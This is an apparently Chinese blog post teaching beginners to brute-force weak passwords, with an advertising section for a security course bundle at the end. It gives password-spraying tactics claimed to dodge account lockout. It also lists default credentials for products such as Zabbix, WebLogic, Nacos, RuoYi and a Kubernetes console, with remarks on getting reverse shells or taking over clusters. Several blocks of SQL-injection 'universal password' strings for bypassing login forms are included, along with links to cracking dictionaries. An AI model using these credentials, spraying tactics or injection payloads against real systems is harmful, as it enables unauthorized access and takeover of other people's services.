HoRain云--Codex 基础入门
2026/6/4 13:29:28
程序员&网络安全小白必看!弱口令爆破全攻略(附工具+字典,建议收藏)
本文面向网络安全入门者与程序员,讲解弱口令爆破的实用技巧,涵盖组合爆破思路、常见弱口令、万能密码、前端泄露密码等方法,梳理了多款常见系统的默认弱口令,附带爆破工具与字典资源,助力新手快速上手漏洞挖掘。
免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号陌笙不太懂安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!前言
依旧永远的0day 只要是能够被爆破出的密码都可以称之为弱口令弱口令爆破技巧
和用户名枚举打组合拳,先通过用户名枚举拿到用户,再去爆破存在用户的密码,效率更高一点。
和信息泄露打组合拳,配合泄露的账号信息进行爆破,账号密码相同,账号+弱口令。
只验证账号直接输入账号admin就可以进入后台。
用户名和密码相同也是一个思路,比如有一次某一个登录框,用户名那里有一个ykxyxl,我直接输了个相同的,ykxyxl,直接进后台,还是管理权限。
直接固定密码爆破用户,固定一个123456,用圈子里的最全用户名字典,进行爆破,很多时候,都能出货,尤其是那种小程序,访问他的web, 我都爆破出来很多,弱口令了,而且这个还能绕过,账户锁定。
用户名固定admin对其密码进行爆破,用户名固定test对其密码进行爆破,如果实在只有一个登录框,只能从这打
对以下用户密码进行爆破:admin、 root、 administrator、 gly、 ceshi、test、 student、 teacher,成功的也有针对edu。
爆破之前可以查看F12看字段是否加密,无验证码实战速通,admin:top1000 密码,usernameTOP10:passwordTOP100,常用测试手机号+top100密码/万能验证码,草叉同步爆破,中文姓名,简拼全写,开发测试账号+通用验证码/万能验证码。
多关注登录框的Nday,jeecgboot,blade,ruoyi,struts,shiro其他可以看思维导图。
常见弱口令
admin/admin123 admin/123456 admin/admin admin/admin888 admin/888888 admin/666666 admin/1admin/1qaz@WSX admin/1qaz!QAZadmin/nulltest/testsystem/systemtest/123456test/test123万能密码
这个本质是注入,但是也算弱口令的一个分支。
asp,apsx万能密码
"or "a"="a'.).or.('.a.'='.a or 1=1--'or 1=1--a'or' 1=1--"or 1=1--'or.'a.'='a"or"="a'='a'or''=''or'='or'admin'or 1=1#php万能密码
admin'/*'or 1=1/*"or "a"="a"or 1=1--"or"=""or"="a'='a"or1=1--"or=or"''or'='or'') or ('a'='a'.).or.('.a.'='.a'or 1=1'or 1=1--'or 1=1/*'or"="a'='a'or' '1'='1''or''=''or''=''or''=''or'='1''or'='or''or.'a.'='a'or1=1--1'or'1'='1a'or' 1=1--a'or'1=1--or 'a'='a'or 1=1--or1=1--jsp万能密码
1'or'1'='1admin' or 1=1/*前端泄露默认密码
- F12全局搜索关键字(账号,密码,user,passwd,name,password等)
- 通过浏览器插件发现
默认填写好的
口令直接在前端登录框填写好的
可以f12查看明文密码,删除type里面的password即可查看
直接点击登录即可进入后台
通过手册或者默认说明发现默认密码
手册
可以发现默认口令通过默认口令爆破用户简单进入系统
或者根据发现的规则自行构造密码进行爆破进入系统
默认说明
通过默认说明配合社工简单突破统一
端口弱口令爆破
有很多工具我这里推荐一手无影,基本涵盖你能看到的所有服务端口。
常见的弱口令及页面
XXL-JOB任务调度中心
XXL-JOB任务调度中心默认账号:admin默认密码:123456后台可反弹shellK8s控制台
默认账号:admin默认密码:P@88w0rd 直接接管集群Zabbix系统监控
默认账号:Admin 默认密码:zabbix 后台可反弹shell,注意大小写grafana控制台
默认账号:admin 默认密码:adminnacos系统
默认账号:naocs 默认密码:nacos 后台有配置信息tomcat控制台
ActiveMQ组件
默认账号:admin 默认密码:adminweblogic控制台
weblogic控制台默认账号:weblogic 默认密码:weblogicRabbitMQ组件
默认账号:admin默认密码:guestgitlab控制台
默认账号:root 默认密码:可爆破druid组件
admin/123456admin/admin123ruoyi/123456ry/123456druid/druid若依
ruoyi/123456admin/admin123admin/12345613888888888/12345613888888888/admin123弱口令生成工具
无影
密探
dictx
dictx- 【1】 默认模式 output:[default.txt]- 【2】 常规模式,关键词:baidu output:[baidu.txt]- 【3】 单用户名模式,人名:张伟 output:[zhangwei.txt]- 【4】 多用户名模式pwdbud
-d --domain #域名 -c --company #公司名 -o --outfile #必须,输出文件 python pwdbud.py -d jd -c jingdong -o res.txt渗透经常使用的弱口令字典
https://github.com/TheKingOfDuck/fuzzDicts https://github.com/SexyBeast233/SecDictionary/tree/master学习资源
2026年最新版本,全网最全的网安视频教程。耗时半年打造,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。
内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。
总共200多节视频,200多G的资源,不用担心学不全。(包含攻击与防守、漏洞挖掘、CTF比赛等技术点)
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
2、 部分核心内容展示
独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识
2、Linux操作系统
3、WEB架构基础与HTTP协议
4、Web渗透测试
5、渗透测试案例分享
6、渗透测试实战技巧
7、攻防对战实战
8、CTF之MISC实战讲解
3、适合学习的人群
一、基础适配人群
- 零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链;
- 开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业;
- 应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
二、能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传,戳下面拿:
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源